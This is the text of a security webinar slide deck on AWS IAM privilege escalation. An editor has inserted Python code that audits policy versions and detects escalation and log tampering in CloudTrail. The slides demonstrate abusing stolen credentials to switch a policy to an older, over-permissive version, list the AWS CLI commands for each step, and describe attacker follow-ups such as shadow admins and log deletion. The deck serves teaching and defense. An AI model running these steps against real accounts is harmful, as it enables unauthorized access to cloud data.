Slide 1

IAM Bad
Privilege Escalation using Misconfigured Policies in AWS IAM
Riyaz Walikar | Co-Founder - Kloudle | [email protected]
May the 4th 2021 – 8:00 AM PDT (8:30 PM IST)

Slide 2

Riyaz Walikar
Co-founder & Chief Breaker of Things @ Kloudle Inc.
Twitter: @riyazwalikar, Blog: https://ibreak.software
• Over a decade of experience in breaking web & mobile apps, networks, wireless, cloud and most recently containers and Kubernetes
• Have led Product Security and Consulting teams at Citrix and PwC SDC in a past life and was the OffSec Lead at Appsecco before moving on to co-founding Kloudle
• Have multiple certifications as a result of my learning curve over the years, including CKA, CKAD, OSCP, CREST etc. (also, because they look cool on LinkedIn ☺)
• Speaker at multiple cons, co-author, trainer, security evangelist with a short attention span and attracted to all things shiny

Slide 3

https://starwarsblog.starwars.com/wp-content/uploads/2021/04/disneyplus-star-wars-day-fan-art-takeover-7387930_TALL.jpg

Slide 4

What is the webinar about?
• What is an AWS IAM policy?
• Common examples of a misconfigured or overly permissive policy
• Demo of a misconfiguration within a policy that leads to privilege escalation
• Q&A

Slide 5

What is an AWS IAM Policy?
• A policy is an object in AWS that, when associated with an identity or resource, defines their permissions.
• AWS evaluates these policies when an IAM principal (user or role) makes a request.
• The permissions in the policies determine whether the request is allowed or denied.

Slide 6

An Example AWS IAM Policy

Slide 7

Some examples of policy misconfigurations / permissive configurations

Slide 8

Common misconfigurations with Policies
• Use of the wildcard * as the Action or the Resource, so the statement is not bound to a specific action or resource

Slide 9

Common misconfigurations with Policies
• Use of an "Action" that could lead to impersonation of another user

Slide 10

Common misconfigurations with Policies
• Multiple policy versions, with an overly permissive configuration in an older version
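The three misconfigurations above can be checked mechanically. The following is an added example written for this edit, not code from the talk or from Kloudle: it audits every version of one customer-managed policy for unbound wildcards, impersonation-capable actions, and an older version that grants more than the current default, and reports the escalation path when the default itself allows switching versions. The sample policy versions, account id, user and policy ARNs are constructed to mirror the shape of the demo; the IMPERSONATION_ACTIONS and RESOURCE_AGNOSTIC sets are my assumptions, since the slides do not enumerate them. The version comparison goes slightly beyond the demo: it flags any non-default version that grants something the default does not, not only the one the talk walks through.

```python
import fnmatch

# Assumption (the talk does not enumerate these): actions that let a principal
# act as, or hand rights to, another identity, including itself.
IMPERSONATION_ACTIONS = {
    "sts:AssumeRole",
    "iam:CreateAccessKey",
    "iam:CreateLoginProfile",
    "iam:UpdateLoginProfile",
    "iam:AttachUserPolicy",
    "iam:PutUserPolicy",
    "iam:CreatePolicyVersion",
    "iam:SetDefaultPolicyVersion",
}
# Assumption: actions that only accept Resource "*", so "*" there is not a finding.
RESOURCE_AGNOSTIC = {"sts:GetCallerIdentity"}

ACCOUNT = "123456789012"  # constructed account id
POLICY_ARN = f"arn:aws:iam::{ACCOUNT}:policy/TarkinPolicy"  # constructed

# Constructed sample shaped like the demo: v6 (the current default) only lets the
# user inspect and switch versions of its own policy, while the older v5 is wide
# open on RDS. Real data comes from list-policy-versions / get-policy-version.
SAMPLE_VERSIONS = {
    "v1": {"is_default": False, "document": {"Version": "2012-10-17", "Statement": [
        {"Effect": "Allow", "Action": "sts:GetCallerIdentity", "Resource": "*"}]}},
    "v5": {"is_default": False, "document": {"Version": "2012-10-17", "Statement": [
        {"Effect": "Allow", "Action": "sts:GetCallerIdentity", "Resource": "*"},
        {"Effect": "Allow", "Action": "rds:*", "Resource": "*"}]}},
    "v6": {"is_default": True, "document": {"Version": "2012-10-17", "Statement": [
        {"Effect": "Allow", "Action": "sts:GetCallerIdentity", "Resource": "*"},
        {"Effect": "Allow", "Action": "iam:ListAttachedUserPolicies",
         "Resource": f"arn:aws:iam::{ACCOUNT}:user/tarkin"},
        {"Effect": "Allow",
         "Action": ["iam:GetPolicy", "iam:ListPolicyVersions",
                    "iam:GetPolicyVersion", "iam:SetDefaultPolicyVersion"],
         "Resource": POLICY_ARN}]}},
}


def _as_list(value):
    """Action and Resource may be a string or a list; normalise to a list."""
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def allow_grants(document):
    """(action pattern, resource pattern) pairs from every Allow statement."""
    grants = set()
    for stmt in _as_list(document.get("Statement")):
        if stmt.get("Effect") != "Allow":
            continue
        for action in _as_list(stmt.get("Action")):
            for resource in _as_list(stmt.get("Resource")):
                grants.add((action, resource))
    return grants


def _covers(pattern_action, pattern_resource, action, resource):
    """Does one grant cover another? Action names are case-insensitive and both
    fields take '*' wildcards, which fnmatch approximates well enough here."""
    return (fnmatch.fnmatchcase(action.lower(), pattern_action.lower())
            and fnmatch.fnmatchcase(resource, pattern_resource))


def audit_document(document):
    """Findings for one policy document: unbound wildcards (slide 8) and
    impersonation-capable actions (slide 9)."""
    findings = []
    grants = allow_grants(document)
    for action, resource in sorted(grants):
        if "*" in action:
            findings.append(f"wildcard action {action} on {resource}")
        elif resource == "*" and action not in RESOURCE_AGNOSTIC:
            findings.append(f"{action} not bound to a resource")
    for risky in sorted(IMPERSONATION_ACTIONS):
        if any(fnmatch.fnmatchcase(risky.lower(), pa.lower()) for pa, _ in grants):
            findings.append(f"impersonation-capable action {risky}")
    return findings


def audit_versions(versions):
    """Slide 10: compare every non-default version against the default and
    report the escalation path when the default can switch versions.
    versions: {"vN": {"is_default": bool, "document": {...}}}."""
    default_id = next(v for v, info in versions.items() if info["is_default"])
    default_grants = allow_grants(versions[default_id]["document"])
    report = {vid: audit_document(info["document"]) for vid, info in versions.items()}
    broader = []
    for vid, info in versions.items():
        if vid == default_id:
            continue
        extra = sorted(
            (a, r) for a, r in allow_grants(info["document"])
            if not any(_covers(da, dr, a, r) for da, dr in default_grants))
        if extra:
            broader.append(vid)
            report[vid].append(f"grants beyond default {default_id}: {extra}")
    can_switch = any(fnmatch.fnmatchcase("iam:setdefaultpolicyversion", pa.lower())
                     for pa, _ in default_grants)
    return {"versions": report, "escalation_path": sorted(broader) if can_switch else []}


if __name__ == "__main__":
    for key, value in audit_versions(SAMPLE_VERSIONS).items():
        print(key, value)
```

In practice the versions dict is built from the output of `aws iam list-policy-versions` and one `aws iam get-policy-version` call per version, which are the same commands the demo uses. The fix for a non-empty escalation_path is to delete the stale versions with `aws iam delete-policy-version` and to keep `iam:SetDefaultPolicyVersion` and `iam:CreatePolicyVersion` out of any policy that the affected principal can reach.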

Slide 11

Demo: multiple policy versions with an overly permissive configuration in an older version

Slide 12

Demo Assumptions and Goal
• Because we are demonstrating privilege escalation, we work with the assumption that we have gained access to General Tarkin’s AWS credentials
• These credentials appear to be non-privileged.
• Our aim is to exploit a misconfiguration in the user’s policy definition and gain access to the employee database for the Death Star

Slide 13

Identify who you are and if you have access

Slide 14

List what user defined policies are attached to the user

Slide 15

Get the policy’s current version number

Slide 16

Get the v6 policy JSON definition

Slide 17

Get a list of available versions for the policy

Slide 18

Get the v1 definition of the policy

Slide 19

Get the v2 definition of the policy (and so on)

Slide 20

Get the v5 definition of the policy (and notice the privileges)

Slide 21

Set v5 of the policy as the default version

Slide 22

Access Darth Vader’s employee database

Slide 23

Post privilege escalation?
• With the kind of access you get, explore what else is available within the AWS account
• Attackers tend to focus on data theft/destruction and attempt to use resources for their own benefit (like crypto-mining)
• Some attackers create a shadow admin account and use it as a backdoor
• To hide their traces within AWS, attackers may also remove AWS logs (CloudTrail, flow logs etc.)
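Every step above leaves a CloudTrail record, which is the defender's handle on it. The following is an added example written for this edit, not code from the talk or from Kloudle: a small detection pass over a CloudTrail log file that alerts on the version switch from the demo, on the shadow-admin pattern (a freshly created user handed AdministratorAccess), and on tampering with the trail itself. The sample records are constructed and carry only the fields the rules read, using the field names real CloudTrail events have; the event-name sets and the one-hour correlation window are my assumptions.

```python
import json
from datetime import datetime, timedelta, timezone

# Assumption: event names that change which policy version is live (the demo's pivot).
VERSION_SWITCH = {"SetDefaultPolicyVersion", "CreatePolicyVersion"}
# Assumption: event names that tamper with the audit trail itself.
LOG_TAMPERING = {"StopLogging", "DeleteTrail", "UpdateTrail", "PutEventSelectors",
                 "DeleteFlowLogs", "DeleteLogGroup"}
ADMIN_POLICY = "arn:aws:iam::aws:policy/AdministratorAccess"

# Constructed sample trail file: CloudTrail delivers JSON with a top-level
# "Records" list. Account id, user names and trail name are made up.
SAMPLE_TRAIL = json.dumps({"Records": [
    {"eventTime": "2021-05-04T15:01:12Z", "eventSource": "iam.amazonaws.com",
     "eventName": "SetDefaultPolicyVersion",
     "userIdentity": {"type": "IAMUser", "userName": "tarkin"},
     "requestParameters": {"policyArn": "arn:aws:iam::123456789012:policy/TarkinPolicy",
                           "versionId": "v5"}},
    {"eventTime": "2021-05-04T15:04:40Z", "eventSource": "rds.amazonaws.com",
     "eventName": "DescribeDBInstances",
     "userIdentity": {"type": "IAMUser", "userName": "tarkin"},
     "requestParameters": None},
    {"eventTime": "2021-05-04T15:10:03Z", "eventSource": "iam.amazonaws.com",
     "eventName": "CreateUser",
     "userIdentity": {"type": "IAMUser", "userName": "tarkin"},
     "requestParameters": {"userName": "svc-backup"}},
    {"eventTime": "2021-05-04T15:11:27Z", "eventSource": "iam.amazonaws.com",
     "eventName": "AttachUserPolicy",
     "userIdentity": {"type": "IAMUser", "userName": "tarkin"},
     "requestParameters": {"userName": "svc-backup", "policyArn": ADMIN_POLICY}},
    {"eventTime": "2021-05-04T15:20:55Z", "eventSource": "cloudtrail.amazonaws.com",
     "eventName": "StopLogging",
     "userIdentity": {"type": "IAMUser", "userName": "tarkin"},
     "requestParameters": {"name": "arn:aws:cloudtrail:us-east-1:123456789012:trail/main"}},
]})


def _when(record):
    """CloudTrail timestamps are UTC in ISO 8601 with a trailing Z."""
    return datetime.strptime(record["eventTime"], "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def _actor(record):
    ident = record.get("userIdentity") or {}
    return ident.get("userName") or ident.get("arn") or ident.get("type", "unknown")


def load_records(trail_json):
    return json.loads(trail_json)["Records"]


def detect(records, shadow_window=timedelta(hours=1)):
    """Return (rule, actor, detail) alerts in time order."""
    alerts = []
    created = {}  # new userName -> time of its CreateUser event
    for rec in sorted(records, key=_when):
        name, actor = rec.get("eventName"), _actor(rec)
        params = rec.get("requestParameters") or {}
        if name in VERSION_SWITCH:
            alerts.append(("policy-version-switch", actor,
                           f"{name} on {params.get('policyArn')} -> "
                           f"{params.get('versionId', 'new version')}"))
        elif name in LOG_TAMPERING:
            alerts.append(("log-tampering", actor, f"{name} {params.get('name', '')}".strip()))
        elif name == "CreateUser" and params.get("userName"):
            created[params["userName"]] = _when(rec)
        elif name == "AttachUserPolicy" and params.get("policyArn") == ADMIN_POLICY:
            target = params.get("userName")
            fresh = target in created and _when(rec) - created[target] <= shadow_window
            rule = "shadow-admin" if fresh else "admin-grant"
            alerts.append((rule, actor, f"AdministratorAccess attached to {target}"))
    return alerts


if __name__ == "__main__":
    for alert in detect(load_records(SAMPLE_TRAIL)):
        print(*alert)
```

A policy-version-switch alert deserves the most attention when the policy named in policyArn is attached to the caller, which the record alone does not tell you; join it against `aws iam list-attached-user-policies` for the actor. Because StopLogging is itself the last event the trail records, ship CloudTrail to a bucket or account the monitored principals cannot write to.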

Slide 24

Commands from the Demo
aws rds describe-db-instances --profile
aws sts get-caller-identity --profile
aws iam list-attached-user-policies --user-name --profile
aws iam get-policy --policy-arn "" --profile
aws iam get-policy-version --policy-arn "" --version-id v6 --profile
aws iam list-policy-versions --policy-arn "" --profile
aws iam get-policy-version --policy-arn "" --version-id v1 --profile
aws iam get-policy-version --policy-arn "" --version-id v2 --profile
aws iam get-policy-version --policy-arn "" --version-id v4 --profile
aws iam get-policy-version --policy-arn "" --version-id v5 --profile
aws iam set-default-policy-version --policy-arn "" --version-id --profile
aws rds describe-db-instances --profile

Slide 25

Image credits
• https://pngimg.com/uploads/stormtrooper/stormtrooper_PNG11.png
• https://thenounproject.com/term/darth-vader/65913/
• https://starwars.fandom.com/wiki/Wilhuff_Tarkin

Slide 26

Q&A
Site: https://kloudle.com
Blog: https://kloudle.com/blog
Twitter:
- @kloudleinc
- @riyazwalikar
Reach us at: [email protected]